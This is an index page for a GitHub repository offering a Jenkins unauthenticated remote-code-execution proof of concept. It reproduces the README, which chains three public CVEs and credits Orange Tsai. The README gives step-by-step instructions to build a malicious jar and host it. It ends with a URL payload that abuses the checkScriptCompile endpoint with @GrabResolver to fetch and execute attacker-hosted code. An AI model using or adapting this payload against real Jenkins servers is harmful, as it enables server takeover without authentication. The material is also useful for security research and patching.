Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/petercunha/jenkins-rce
:smiling_imp: Jenkins RCE PoC. From unauthenticated user to remote code execution, it's a hacker's dream!
Last synced: 7 days ago
- Host: GitHub
- URL: https://github.com/petercunha/jenkins-rce
- Owner: petercunha
- Created: 2019-02-19T19:39:43.000Z (almost 6 years ago)
- Default Branch: master
- Last Pushed: 2019-06-10T06:57:58.000Z (over 5 years ago)
- Last Synced: 2025-01-22T17:13:12.906Z (15 days ago)
- Topics: exploit, hacking, jenkins, orangetw, rce, unauthenticated
- Language: Java
- Homepage:
- Size: 14.6 KB
- Stars: 295
- Watchers: 6
- Forks: 66
- Open Issues: 0
Metadata Files:
- Readme: README.txt
README
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION
---------------------------------------------
Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw).
It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution!
Read his write-ups on this exploit here -
Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
His github: https://github.com/orangetw

INSTRUCTIONS:
-------------
- Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder.
- Once that is finished, copy the inner contents of www/ to a webserver.
- In the URL payload, replace with the hostname of the server, and to the hostname of where you uploaded your files.

URL Payload:
------------
http:///securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile
?value=
@GrabConfig(disableChecksums=true)%0a
@GrabResolver(name='payload', root='http://')%0a
@Grab(group='package', module='payload', version='1')%0a
import Payload;